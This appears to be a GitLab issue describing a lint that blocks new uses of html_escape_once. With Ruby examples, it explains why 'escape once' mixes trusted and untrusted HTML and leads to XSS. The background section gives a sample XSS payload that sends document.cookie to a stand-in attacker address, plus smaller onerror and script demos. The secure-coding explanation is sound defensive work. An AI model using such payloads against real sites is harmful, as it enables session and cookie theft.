Ratchet for use of html_escape_once/escape_once (in app and specs)
ERB::Util.html_escape_once is based on the fundamentally flawed idea that we can escape HTML "once". It sat at (or close to) the heart of many XSS vulnerabilities in our codebase. Those particular uses have been removed, but other calls remain, and more may be added in the future.
Accordingly, in Add lint against adding uses of html_escape_once (!216060), we're adding a lint to the codebase to stop the addition of new calls to this function, or its close cousin Banzai::Filter::Concerns::OutputSafety#escape_once.
Background
How many encoding- or escaping-adjacent functions do you know of that are irreversible? What about ones which irreversibly blur the lines between trusted and untrusted content?
CGI.escapeHTML replaces characters that could be recognised as comprising HTML tags or character references (aka "entities") with character references that represent those characters. In other words, < might be seen as the start of a tag, so we replace it with the character entity reference &lt;, which represents the character < in a text node or attribute value without any possibility of it being parsed as anything but text.
It also replaces >, " and ' with &gt;, &quot; and &#39; respectively. These are all essential in ensuring that we can drop a value into a tag’s attribute value without unexpected meaning switches. <img alt=funny>? Not so funny if the alt text is user-supplied and they choose the value ><script>window.location.href='https://66.66.66.66/exfil?'+document.cookie</script>.
Importantly, it will also replace & with &amp;, otherwise there would be no way to actually write the text &lt; on the page without it turning into a <. We write &amp;lt; in HTML to get that text.
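As a quick check of the replacements described above, here is a minimal sketch using only Ruby's standard library. The sample strings are made up for illustration.

```ruby
require "cgi"

# The five characters CGI.escapeHTML rewrites, and what each becomes.
puts CGI.escapeHTML("1 < 2")                        # 1 &lt; 2
puts CGI.escapeHTML(%q("it's"))                     # &quot;it&#39;s&quot;
puts CGI.escapeHTML("><script>alert(1)</script>")   # &gt;&lt;script&gt;alert(1)&lt;/script&gt;

# "&" is escaped too, so text that looks like an entity survives as text.
puts CGI.escapeHTML("&lt;")                         # &amp;lt;
```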
Sometimes we cobble together input text from various sources, occasionally mixing text sources (like a plain <input type="text">) and HTML sources (such as from a WYSIWYG editor's innerHTML). If a user writes 1 < 2 in both of these places, we'd get the string 1 < 2 from the <input> and 1 &lt; 2 from the WYSIWYG editor. If we want to put both of these into the same DOM element, how do we do it?
The correct solution is to escape the first input, but not the second. Now they're both HTML, we sanitise them both, and can put them in the document.
Unfortunately, sometimes it's too late to treat them separately: we've mixed them into the one place. Escaping it all means we'll get 1 &lt; 2 for the first (which will correctly display in HTML as the text 1 < 2), but 1 &amp;lt; 2 for the second (which will display in HTML as the text 1 &lt; 2: ugly!).
html_escape_once attempts to be a bandaid for this situation. It works like CGI.escapeHTML, except it won't escape anything that already looks like a character entity reference. It'll turn < into &lt;, but it won't turn e.g. &lt; into &amp;lt;; it'll leave it. In this situation, it happens to do the right thing.
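To make the mixed-source case concrete, here is a rough sketch. So that it runs without Rails, it uses a hypothetical stand-in, escape_once_sketch, rather than ERB::Util.html_escape_once itself. The pattern is an assumption modelled on the behaviour described above and may differ from the real implementation in edge cases.

```ruby
require "cgi"

# Hypothetical stand-in for html_escape_once (an assumption, not the Rails
# source): escape the special characters, but skip any "&" that already
# starts something shaped like a character reference.
ESCAPE_ONCE_PATTERN = /["'<>]|&(?![a-zA-Z]+;|#\d+;|#[xX]\h+;)/

def escape_once_sketch(text)
  text.gsub(ESCAPE_ONCE_PATTERN) { |char| CGI.escapeHTML(char) }
end

from_input  = "1 < 2"     # plain text, e.g. from an <input type="text">
from_editor = "1 &lt; 2"  # HTML, e.g. from a WYSIWYG editor's innerHTML
mixed = "#{from_input} and #{from_editor}"

puts CGI.escapeHTML(mixed)      # 1 &lt; 2 and 1 &amp;lt; 2
puts escape_once_sketch(mixed)  # 1 &lt; 2 and 1 &lt; 2
```

The second line of output looks right only because the sketch guesses that every entity-shaped substring was meant as HTML.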
The problem is, this is an irreversible process: we can never safely unescape this content again, because any character references that were already in the input weren't touched. This can quickly become an XSS vector, especially when these functions are used in HTML tag attribute values: if we store HTML in attributes (and we do), "escape once" is equivalent to unescaped! The documents <a title="<xss>"> and <a title="&lt;xss&gt;"> are indistinguishable from a DOM point of view. This is scary but very true!
Note further the way this corrupts user input: if a user enters text like Let's add an <input> here in a text field (because they're a web developer, say), html_escape_once will turn that into Let&#39;s add an &lt;input&gt; here. That's OK: it will render faithfully to their intent. But if they enter What about using "&lt;" here? because they're talking about HTML entities, it won't touch the entity, and will render as What about using "<" here?. We don't need to be corrupting user input this way! Using CGI.escapeHTML here gives us the correct answer.
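Both failure modes can be sketched in a few lines. As before, escape_once_sketch is a hypothetical stand-in for html_escape_once, with an assumed pattern. CGI.unescapeHTML stands in, loosely, for the decoding an HTML parser performs on attribute values.

```ruby
require "cgi"

# Hypothetical stand-in for html_escape_once (assumed pattern, not the Rails source).
ESCAPE_ONCE_PATTERN = /["'<>]|&(?![a-zA-Z]+;|#\d+;|#[xX]\h+;)/

def escape_once_sketch(text)
  text.gsub(ESCAPE_ONCE_PATTERN) { |char| CGI.escapeHTML(char) }
end

# 1. A payload that is already entity-encoded passes through untouched, so
#    anything that later decodes it gets the attacker's markup back.
payload = "&lt;img src=x onerror=alert(1)&gt;"
puts escape_once_sketch(payload) == payload            # true
puts CGI.unescapeHTML(escape_once_sketch(payload))     # <img src=x onerror=alert(1)>

# 2. Two different user inputs collapse into one output, so the original
#    can no longer be recovered.
typed_character = 'What about using "<" here?'
typed_entity    = 'What about using "&lt;" here?'
puts escape_once_sketch(typed_character) == escape_once_sketch(typed_entity)  # true

# CGI.escapeHTML keeps them distinct.
puts CGI.escapeHTML(typed_entity)  # What about using &quot;&amp;lt;&quot; here?
```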
What's the root of this problem?
Let's analyse the meaning of these functions; not the how, but the what:
- escapeHTML: take some text and render it into HTML in such a way that it represents the same value when encountered in a text node or attribute.
  - I have the text 100 > 50. I want the HTML equivalent of this. I put it through escapeHTML. I get 100 &gt; 50. That's HTML, and if I put that into a tag, that tag will contain a text node with the content 100 > 50. Perfect.
- unescapeHTML: take some HTML as encountered in the source body of a text node or attribute, and render it into text in such a way that it represents the same value.
  - I read the HTML <p>100 &gt; 50</p>. I want the textual content of this, and for Reasons™, I have to do it without an HTML parser. I strip tags and I'm left with 100 &gt; 50. I run that through unescapeHTML, and I get 100 > 50. Passable.
These functions are complementary, and indeed, unescapeHTML(escapeHTML(x)) will always equal x.
(It's really important to note, however, that escapeHTML(unescapeHTML(x)) will very often not equal x, with security-catastrophic consequences. I address this toward the end.)
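The asymmetry between the two round trips can be checked directly. This is a small sketch using the standard library. The helper names and sample strings are invented for illustration.

```ruby
require "cgi"

# Escape text, then unescape it: this round trip always holds.
def text_round_trips?(text)
  CGI.unescapeHTML(CGI.escapeHTML(text)) == text
end

# Unescape HTML we did not escape ourselves, then re-escape: often it does not.
def html_round_trips?(html)
  CGI.escapeHTML(CGI.unescapeHTML(html)) == html
end

puts text_round_trips?(%q(Tom & Jerry say "1 < 2"))  # true
puts text_round_trips?("&lt;already escaped&gt;")    # true
puts html_round_trips?("<b>hi</b>")                  # false
puts html_round_trips?("&#x3C;")                     # false

# Why that matters: unescaping a page fragment promotes the escaped user text
# to the same level as the system's own markup.
system_html = "<b>Title:</b> "
user_text   = "<script>"
fragment    = system_html + CGI.escapeHTML(user_text)
puts fragment                     # <b>Title:</b> &lt;script&gt;
puts CGI.unescapeHTML(fragment)   # <b>Title:</b> <script>
```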
But first, let's try to describe the "what" of html_escape_once. What would that be like?
Take some .. text? Well, no, not really — it might contain entities, the whole point of the _once bit is we don't want to touch entities, so we're conceding it might not just be text. We want those entities to represent their value.
Take some HTML? Well, uh, no, we're explicitly trying not to do that. If there's HTML tags in there, we want them escaped!
Take some text-ish HTML and render it into HTML in such a way that whatever looked like HTML is treated like text but things that look like HTML entities are treated like entities, in such a way that it represents, uh. Something.
This is a problem, and the reason is in the messiness of this definition. When do we have text-ish HTML? Hopefully never. We can never consistently treat it as one or the other. If we html_escape_once some text-ish HTML, we've turned it into "just HTML" (albeit HTML that will almost certainly represent something illegible at some point), but we can never, ever unescape it again. Why? We've mixed text and HTML into the same "trust level".
Text in its unadulterated "text" form is something we can handle safely. We can store it in a database field, knowing it faithfully represents some input exactly as intended. We can put it in a text node in the DOM. We can escape it and put it in HTML, although hopefully our framework is doing this for us.
Importantly, if we do escape it into HTML ourselves, we know the resulting HTML is also trusted, and safe for display. The user-controlled portion has been neutralised. We could write, say, <b>#{escapeHTML(user_text_input)}</b> into a .erb file, and we know that if they typed Add <input>, when we open that view, we should see those very letters Add <input> in bold, with no surprise textboxes.
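A minimal sketch of that bold example, using plain standard-library ERB (which, unlike Rails views, does not escape output automatically). The template string, the render_bold helper and the ERB output tag are illustrative assumptions rather than code from our views.

```ruby
require "cgi"
require "erb"

# Hypothetical one-line template: trusted markup around escaped user text.
BOLD_TEMPLATE = ERB.new("<b><%= CGI.escapeHTML(user_text_input) %></b>")

def render_bold(user_text_input)
  BOLD_TEMPLATE.result_with_hash(user_text_input: user_text_input)
end

puts render_bold("Add <input>")  # <b>Add &lt;input&gt;</b>
```

A browser shows that output as the bold text Add <input>, with no textbox.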
On the other hand, if we receive HTML from the client, it is not trusted. Even if it's meant to come from our own editor, there's nothing stopping the user sending us <script>blahBlah.megaEvil()</script> anyway, and mixing that into our output without the appropriate steps is a recipe for an instant XSS.
(Sanitising doesn't fix this part, either. We might not want a user to be able to drop an actual unordered list in the middle of a milestone title, but does that mean if a user types <ul> in there, it should disappear? No: they should see the text <ul>! It's a text field, not an HTML entry field. Right? We need to decide!)
We can say that escapeHTML encodes text as HTML, preserving the level of trust while changing the acceptable context for the value. The corollary is that unescapeHTML decodes HTML into text (though it only preserves the level of trust inasmuch as you originally encoded it as HTML to begin with; see below).
html_escape_once encodes text as HTML, preserving the level of trust, except for entities in the original text, which are left untouched, and migrate a level of trust “upwards”. The output is of mixed trust, in a single string. Here be dragons.
Diagrammatic tl;dr
Here's what happens when we're just escaping and unescaping HTML:
The "it's really important to note" from earlier comes in here: you can't unescape content that you didn't first escape yourself. If you do, here be dragons: note the dashed red line. Once you pass it, you're stuck on the other side, with mixed trust levels. User input has become indistinguishable from the system HTML. We really want to avoid getting stuck on the other side of the dashed line.
Here's what this diagram looks like with html_escape_once added to the picture:
This is why it's such a problem. It either (a) does nothing, OR, (b) it ruins your week. If your week was already ruined — if your content is already mixed, and this is why it seems like you have to use it — address the problem at its root. Unmix the content, and then treat user input separately to keep it safe (and known). Using CGI.escapeHTML can help you safely find those sources of mixing by making it obvious — you'll start seeing entities on the page! This is the hard work involved in getting our application XSS-free.
Thanks for reading!
References
Prior work referencing the idea that I want to do this, or motivating that we need to do this to prevent relapses:
- Clearly delineate text and HTML in Banzai, and ... (!207397 - merged)
- Compose HTML consistently in Banzai reference f... (!208270 - merged)
- https://gitlab.com/gitlab-org/security/gitlab/-/merge_requests/2275+
- Fix accidental promotion of label content to HT... (!211696 - merged)
- Stop unescaping HTML in BaseLabel#title=, #desc... (!207594 - merged)

